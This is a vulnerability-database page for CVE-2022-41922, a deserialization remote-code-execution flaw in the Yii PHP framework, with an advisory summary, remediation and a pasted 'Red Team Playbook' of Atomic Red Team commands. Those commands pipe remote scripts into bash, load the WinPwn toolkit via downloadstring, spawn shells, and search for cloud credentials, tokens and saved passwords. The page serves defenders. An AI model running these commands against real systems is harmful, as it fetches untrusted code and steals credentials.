CVE-2022-41922
Overview
This vulnerability is a remote code execution (RCE) flaw rooted in insecure deserialization. The affected component is the yiisoft/yii PHP framework versions prior to 1.1.27, where the application invokes the unserialize() function on untrusted user input. This unsafe deserialization allows attackers to manipulate object data structures leading to arbitrary code execution within the application context.
Vulnerability Description
`yiisoft/yii` before version 1.1.27 are vulnerable to Remote Code Execution (RCE) if the application calls `unserialize()` on arbitrary user input. This has been patched in 1.1.27.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code on the server hosting the yii framework, potentially leading to full system compromise. The attack requires only network access and the ability to supply crafted serialized input to the application. This can result in data breaches, service disruption, or lateral movement within the environment. The CVSS vector indicates high impact with no privileges or user interaction required (AV:N/AC:H/PR:N/UI:N), emphasizing the severity of remote exploitation under high attack complexity.
Solution
To remediate this vulnerability, upgrade yiisoft/yii to version 1.1.27 or later as per the official GitHub security advisory GHSA-442f-wcwq-fpcf. The patch commit ed67b7cc57216557c5c595c6650cdd2d3aa41c52 contains the code changes that secure the unserialize() usage. No vendor workarounds are documented; therefore, applying the vendor-provided update is the recommended course of action.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Yii framework arises from improper handling of user input through the `unserialize()` function, which can lead to Remote Code Execution (RCE). This occurs when an application processes serialized data from untrusted sources without adequate validation. The `unserialize()` function is designed to convert a serialized string back into a PHP value, but if an attacker can manipulate the input, they can inject malicious payloads that execute arbitrary code on the server. This flaw is particularly critical because it allows an attacker to gain control over the application environment, potentially leading to full system compromise.
Exploitation of this vulnerability can occur through various attack vectors. An attacker may craft a malicious payload that, when passed to the vulnerable application, triggers the execution of arbitrary PHP code. For instance, if an application accepts serialized data from user input—such as through forms or API requests—an attacker could submit a specially crafted string that includes PHP objects with malicious methods. Once the application unserializes this data, the attacker's code could execute with the same privileges as the web server, leading to unauthorized access to sensitive data, manipulation of application logic, or even complete server takeover.
The real-world impact of this vulnerability is significant, especially for businesses relying on the Yii framework for their web applications. The potential for RCE means that an attacker could exploit this flaw to access confidential information, disrupt services, or deploy malware. The consequences of such breaches can be severe, including financial losses, reputational damage, and legal ramifications due to non-compliance with data protection regulations. Organizations may face downtime, loss of customer trust, and the costs associated with incident response and remediation efforts. The high CVSS score of 9.8 underscores the critical nature of this vulnerability, emphasizing the urgent need for organizations to address it.
To detect this vulnerability, organizations should employ a combination of code review, static analysis tools, and dynamic application security testing. Regularly updating the Yii framework to the latest version is crucial, as patches have been released to mitigate this vulnerability. Additionally, implementing input validation and sanitization measures can significantly reduce the risk of exploitation. Developers should avoid using `unserialize()` on untrusted input and consider safer alternatives, such as JSON encoding and decoding, which do not allow for arbitrary code execution. Furthermore, employing web application firewalls (WAFs) can help detect and block malicious payloads before they reach the application.
In conclusion, the vulnerability within the Yii framework represents a serious threat to web applications that utilize this technology. The potential for remote code execution poses significant risks to organizations, making it imperative for them to adopt robust security practices. By prioritizing timely updates, implementing strong input validation, and leveraging security tools, businesses can protect themselves against this and similar vulnerabilities, thereby safeguarding their applications and sensitive data from malicious actors.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Yiiframework | Yii | All |
cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
48%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-41922 |
| github.com |
GitHub CVE
|
https://github.com/yiisoft/yii/security/advisories/GHSA-442f-wcwq-fpcf |
| github.com |
GitHub CVE
|
https://github.com/yiisoft/yii/commit/ed67b7cc57216557c5c595c6650cdd2d3aa41c52 |